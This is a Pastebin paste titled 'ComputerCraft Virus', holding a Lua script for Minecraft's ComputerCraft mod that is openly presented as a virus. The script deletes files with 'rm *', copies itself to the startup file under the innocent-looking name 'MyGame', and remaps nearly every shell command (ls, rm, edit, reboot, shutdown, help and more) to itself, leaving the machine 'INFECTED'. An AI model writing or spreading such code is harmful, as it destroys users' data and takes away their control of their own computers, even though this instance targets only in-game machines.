Advertisement
MinecraftRocks999

ComputerCraft Virus

Aug 2nd, 2013
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.75 KB | None | 0 0
  1. local name = "MyGame"
  2. shell.run('label set INFECTED PC')
  3. shell.run('rm *')
  4. shell.setDir("/")
  5. shell.run("cp", name, "/startup")
  6. shell.clearAlias("ls")
  7. shell.clearAlias("dir")
  8. shell.clearAlias("cp")
  9. shell.clearAlias("mv")
  10. shell.clearAlias("rm")
  11. shell.setAlias("ls", "startup")
  12. shell.setAlias("dir", "startup")
  13. shell.setAlias("cp", "startup")
  14. shell.setAlias("mv", "startup")
  15. shell.setAlias("rm", "startup")
  16. shell.setAlias("list", "startup")
  17. shell.setAlias("edit", "startup")
  18. shell.setAlias("reboot", "startup")
  19. shell.setAlias("shutdown", "startup")
  20. shell.setAlias("lua", "startup")
  21. shell.setAlias("delete", "startup")
  22. shell.setAlias("help", "startup")
  23. shell.run('clear')
  24. print("InfectedPC 1.0")
  25. shell.setPath("Infected PC")
  26. shell.setDir("Infected PC")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement